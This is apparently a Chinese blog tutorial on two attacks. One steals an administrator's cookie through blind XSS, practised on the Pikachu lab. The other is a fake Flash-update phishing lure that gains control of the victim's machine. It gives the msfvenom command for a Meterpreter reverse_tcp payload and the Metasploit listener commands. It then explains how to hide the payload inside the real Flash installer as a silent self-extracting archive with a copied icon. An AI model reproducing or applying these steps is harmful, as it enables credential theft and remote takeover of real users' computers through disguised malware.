xss平台获取管理员cookie xss flash钓鱼拿到主机控制权

1.XSS-窃取Cookie 网站注册账号并登陆

https://xssaq.com/

2.查看配置代码

3.打开一个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输入进去

4.模拟管理员登录后台的操作 登录完成后触发我们插入的恶意代码

5.回到平台上可看到其劫持的Cookie信息.

xss flash钓鱼拿到主机控制权

1.本机phpstudy中开启web服务

2.下载项目并将其源码文件部署在网站根目录下修改并访问

https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash

3.来到xss平台 点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成一个js文件放到我们网站的根目录下面

4.进一步对提供下载的Flash文件进行伪装...在真的Flash官网下载安装程序并使用MSF生成一个木马

# Flash官网下载
https://www.flash.cn/download-wins
# MSF生成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=虚拟机ip LPORT=44
44 -f exe > shell.exe
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run

kali中运行代码下载shell.exe 拖到本机 

 5.将两个文件一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",点击"高级"标签页下的"自解压选项"填
写解压路径为C:\Windows\Temp

 

C:\Windows\Temp\shell.exe
C:\Windows\Temp\flashcenter_pp_ax_install_cn.exe 

点击"设置"--"解压后运行"如下两行内容...并在"模式"标签下设置"全部隐藏" 配置更新方式----解压并更新文件而覆盖方式----覆盖所有文件

6.管理员进入后自动跳转

7.kali运行  模拟受害者的流程 最终获取到受害者网站控制权

ps:为了更好的迷惑可以使用 ResourceHacker修改图标,下载安装;通过ResourceHacker打开原版的flash安
装程序,点击Icon Group文件夹中的文件,鼠标右键"保存*.ico资源",即可导出ico图标

# 下载地址
https://www.onlinedown.net/soft/12420.htm

 

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值